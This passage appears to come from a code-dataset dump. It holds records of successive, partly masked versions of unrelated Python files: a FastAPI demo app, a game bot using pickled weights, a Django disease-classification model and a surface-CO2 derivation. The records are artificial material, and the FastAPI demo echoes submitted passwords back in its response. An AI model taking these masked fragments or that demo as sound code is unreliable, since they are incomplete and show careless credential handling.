'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-4": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = 
await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', 
context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-5": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\n\npayloads = {\n 'peoples': [\n {\n 'firstname': 'watcharapon',\n 'lastname': 'weeraborirak',\n 'age': '24',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'somsak',\n 'lastname': 'tamjai',\n 'age': '22',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'rakkana',\n 'lastname': 'meejai',\n 'age': '66',\n 'city': 'outcast'\n },\n ]\n}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n def get_route_handler(self) -> Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) -> Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))\n return response\n\n\n@app.middleware('http')\nasync def 
add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get(\"/items_id/{item_id}\")\nasync def read_items(\n item_id: int = Path(..., title=\"The ID of the item to get\"),\n q: Optional[str] = Query(None, alias=\"item-query\")\n):\n results = {\"item_id\": item_id}\n if q:\n results.update({\"q\": q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str = None): # query param string\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str = Header(...)): # Header\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail=\"X-Item-ID header invalid\")\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str = Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}') # dynamic route\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post(\"/payload_json\")\nasync def create_item(payload: dict = Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str = Form(...), username: str = Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies 
darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})\n\n\n@app.get(\"/func_element\", response_model=Item, tags=[\"Description\"], deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post(\"/func_item\", response_model=Item, tags=[\"Description\"], summary=\"Create an item\",\n description=\"Create an item with all the , name, description, price, tax and a set of unique tags\")\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
<|reserved_special_token_0|>
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
if __name__ == '__main__':
with open(CONFIG_FILENAME, 'r') as f:
data = json.load(f)
player_name = data['nickName']
player = 'A' if player_name == 'Guido' else 'B'
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
STATE_FILENAME = 'state3.json'
CONFIG_FILENAME = 'bot.json'
WEIGHTS_FILENAME = 'weights.pkl'
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
if __name__ == '__main__':
with open(CONFIG_FILENAME, 'r') as f:
data = json.load(f)
player_name = data['nickName']
player = 'A' if player_name == 'Guido' else 'B'
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
<|reserved_special_token_1|>
import numpy as np
import json
import random
from encapsulate_state import StateEncapsulator
from scalar_to_action import ActionMapper
import pickle
from basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP
import matplotlib.pyplot as plt
STATE_FILENAME = 'state3.json'
CONFIG_FILENAME = 'bot.json'
WEIGHTS_FILENAME = 'weights.pkl'
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
if __name__ == '__main__':
with open(CONFIG_FILENAME, 'r') as f:
data = json.load(f)
player_name = data['nickName']
player = 'A' if player_name == 'Guido' else 'B'
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
<|reserved_special_token_1|>
import numpy as np
import json
import random
from encapsulate_state import StateEncapsulator
from scalar_to_action import ActionMapper
import pickle
from basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP
import matplotlib.pyplot as plt
STATE_FILENAME = "state3.json"
CONFIG_FILENAME = "bot.json"
WEIGHTS_FILENAME = "weights.pkl"
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, "r") as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, "rb") as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ""
# Expects as input a 3D tensor representing the state, un-flattened; returns a list action
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:
self.command = str(action_list[0]) + "," + str(action_list[1]) + "," + str(action_list[2])
with open("command.txt", "w") as outfl:
outfl.write(self.command)
############################################################################################
if __name__ == "__main__":
with open(CONFIG_FILENAME, "r") as f:
data = json.load(f)
player_name = data["nickName"]
player = "A" if player_name == "Guido" else "B"
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
|
flexible
|
{
"blob_id": "e9a6baf10efc5b6bd07af1fe352b0b17ecc172bd",
"index": 1855,
"step-1": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n <mask token>\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-3": "<mask token>\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-4": "import numpy as np\nimport json\nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-5": "import numpy as np \nimport json \nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\n\nSTATE_FILENAME = \"state3.json\"\nCONFIG_FILENAME = \"bot.json\"\nWEIGHTS_FILENAME = \"weights.pkl\"\nDO_NOTHING_ACTION = [-1, -1, -1]\n\nclass LinearBot(object):\n\t\tdef __init__(self, player, player_name, weights_file, basis):\n\t\t\tself.reader = StateEncapsulator(player, player_name)\n\n\t\t\twith open(STATE_FILENAME, \"r\") as f:\n\t\t\t\tdata = json.load(f)\n\t\t\tself.state = self.reader.parse_state(data)\n\n\t\t\twith open(weights_file, \"rb\") as pkl:\n\t\t\t\tself.weights = pickle.load(pkl)\n\n\t\t\tself.action_mapper = ActionMapper()\n\t\t\tself.basis = basis\n\t\t\tself.command = \"\"\n\n\t\t# Expects as input a 3D tensor representing the state, un-flattened; returns a list action\n\t\tdef __get_next_action(self, sp):\n\t\t\tsp = sp.flatten()\n\t\t\tq_values = []\n\t\t\tfor action in self.action_mapper.triples:\n\t\t\t\tsp_ap = np.array(list(sp) + list(action))\n\t\t\t\tsp_ap = self.basis(sp_ap)\n\t\t\t\tq_values.append(np.dot(sp_ap, self.weights))\n\n\t\t\treturn list(self.action_mapper.triples[np.argmax(q_values)])\n\n\t\tdef write_action(self):\n\t\t\taction_list = self.__get_next_action(self.state)\n\t\t\tif (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:\n\t\t\t\tself.command = str(action_list[0]) + \",\" + str(action_list[1]) + \",\" + str(action_list[2])\n\t\t\twith open(\"command.txt\", \"w\") as outfl:\n\t\t\t\toutfl.write(self.command)\n\n############################################################################################\n\nif __name__ == \"__main__\":\n\twith open(CONFIG_FILENAME, \"r\") as f:\n\t\tdata = json.load(f)\n\t\tplayer_name = data[\"nickName\"]\n\t\tplayer = \"A\" if player_name == 
\"Guido\" else \"B\"\n\n\tbot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n\tbot.write_action()\n\t",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
class ClassMKB(models.Model):
name = models.CharField(max_length=512,verbose_name = 'Наименование')
code = models.CharField(max_length=20, null=True, blank=True,verbose_name = 'Код')
parent_id = models.IntegerField(null=True, blank=True)
parent_code = models.CharField(max_length=100, null=True, blank=True,verbose_name = 'Код предка')
node_count = models.SmallIntegerField(default=0, null=True, blank=True,verbose_name = 'Количество в группе')
additional_info = models.TextField(null=True, blank=True,verbose_name = 'Дополнительно')
class Meta:
db_table = 'class_mkb'
verbose_name = 'Международная класификация болезней'
verbose_name_plural = 'Международная класификация болезней'
def __unicode__(self):
return self.name
|
normal
|
{
"blob_id": "8753996c90ecea685e6312020dfd31fabb366138",
"index": 5270,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ClassMKB(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name\n",
"step-3": "<mask token>\n\n\nclass ClassMKB(models.Model):\n name = models.CharField(max_length=512, verbose_name='Наименование')\n code = models.CharField(max_length=20, null=True, blank=True,\n verbose_name='Код')\n parent_id = models.IntegerField(null=True, blank=True)\n parent_code = models.CharField(max_length=100, null=True, blank=True,\n verbose_name='Код предка')\n node_count = models.SmallIntegerField(default=0, null=True, blank=True,\n verbose_name='Количество в группе')\n additional_info = models.TextField(null=True, blank=True, verbose_name=\n 'Дополнительно')\n\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models\n\n\nclass ClassMKB(models.Model):\n name = models.CharField(max_length=512, verbose_name='Наименование')\n code = models.CharField(max_length=20, null=True, blank=True,\n verbose_name='Код')\n parent_id = models.IntegerField(null=True, blank=True)\n parent_code = models.CharField(max_length=100, null=True, blank=True,\n verbose_name='Код предка')\n node_count = models.SmallIntegerField(default=0, null=True, blank=True,\n verbose_name='Количество в группе')\n additional_info = models.TextField(null=True, blank=True, verbose_name=\n 'Дополнительно')\n\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\n\n\nclass ClassMKB(models.Model):\n\n name = models.CharField(max_length=512,verbose_name = 'Наименование')\n code = models.CharField(max_length=20, null=True, blank=True,verbose_name = 'Код')\n parent_id = models.IntegerField(null=True, blank=True)\n parent_code = models.CharField(max_length=100, null=True, blank=True,verbose_name = 'Код предка')\n node_count = models.SmallIntegerField(default=0, null=True, blank=True,verbose_name = 'Количество в группе')\n additional_info = models.TextField(null=True, blank=True,verbose_name = 'Дополнительно')\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class DerivedVariable(DerivedVariableBase):
<|reserved_special_token_0|>
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
